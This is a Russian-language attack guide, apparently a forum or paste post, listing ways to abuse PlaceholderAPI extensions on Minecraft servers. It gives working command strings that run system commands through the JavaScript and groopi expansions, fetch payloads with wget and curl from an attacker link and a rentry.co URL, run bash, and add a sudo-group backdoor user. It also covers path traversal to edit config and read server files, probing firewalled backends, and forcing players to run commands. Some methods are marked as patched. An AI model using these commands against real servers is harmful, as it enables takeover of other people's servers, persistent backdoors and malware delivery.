Шальной плагин PlaceholderAPI умеет подкачивать
расширения, их очень много.
Некоторыми можно коннкретно трахнуть сервер.

--------------------------------------------------------------------------------------------/
Способ 1 (Пофикшено со стороны сервера)

Качаем расширение JavaScript 2.1.0 или ниже (/papi ecloud download JavaScript 2.1.0)
В расширении присутствует команда, исполняющая JS-код на сервере
Но этот самый JavaScript умеет исполнять системные команды.
Пользуемся, прописывая:
/jsexp parse me new java.lang.ProcessBuilder("аргумент 1", "аргумент 2").start();
По такому образцу должны выглядеть наши команды:
/jsexp parse me new java.lang.ProcessBuilder("wget", "ссылка").start();
/jsexp parse me new java.lang.ProcessBuilder("bash", "raw").start();
Или:
/jsexp parse me new java.lang.ProcessBuilder("useradd","-u","1337","-G","sudo","-d","/home/lol","-p","pasu1pLKLje2M","lol").start();
--------------------------------------------------------------------------------------------/

Способ 2 (Пофикшено со стороны сервера)

Качаем расширение MinePacks 1.0.6 и ниже
Расширение взаимодействует с "рюкзаками" через файлы, но через LFI такое можно абузить.
Аргумент set РЕДАКТИРУЕТ любой файл на сервере.
Так выглядело использование команды во время того, когда существовали неверифицированые расширения.

/papi parse me %minepacks_set ./PlaceholderAPI/config cloud_allow_unverified_expansions true%
/papi parse me %minepacks_set ../PlaceholderAPI/config cloud_allow_unverified_expansions true%
/papi reload

Таким образом подгружали неверифицированые расширения и ими дампали сервер:

/papi ecloud download groopi
/papi reload
/papi parse me %groopi_java.lang.Runtime.getRuntime().exec("curl -O ВАШАССЫЛКАНАЗАГРУЗКУ")%
/papi parse me %groopi_java.lang.Runtime.getRuntime().exec("bash raw")%

Или же

papi ecloud download fetch
/papi reload
/papi parse me %fetch_ test 1 ВашаСсылкаНаЗагрузку%
/papi register ../../../fetch/test
/papi parse me %rce_curl_-O_https://rentry.co/eo7oc/raw%
/papi parse me %rce_bash_raw%
--------------------------------------------------------------------------------------------/

Способ 3

Расширение Pinger способно пинговать сервера, даже если сам сервер не подключен к прокси

/papi parse me %pinger_isonline_127.0.0.1:25565%
(Таким образом можно пинговать айпи бекендов в обход фаервола)

Также можно
--------------------------------------------------------------------------------------------/

Способ 4

Заставляем игроков исполнять команды против его воли.
Расширение Advancements непонятно зачем засунуло возможность исполнять команды. 
(Только те, что игнорируют лишние аргументы в конце)

/papi parse me %advancements_list_команда без /%
--------------------------------------------------------------------------------------------/

Способ 5 (Shortcut 1.0.0-1.3.0)

Чтение .txt файлов на сервере
Расширение Shortcut создавалось для парсинга плейсхолдеров из .txt файла.
Но оно с LFI пробираемся в нужную нам директорию и читаем.
По неведомой причине невозможно пробраться в .txt файлы других плагинов, но eula и краш-репорты
читаются спосойно.

/papi ecloud download Shortcut 1.0.0
/papi reload
/papi parse me %shortcut_../../../eula%

Пофикшено в 1.4.0, версии до 1.3.0 включительно были убраны с ECloud
--------------------------------------------------------------------------------------------/
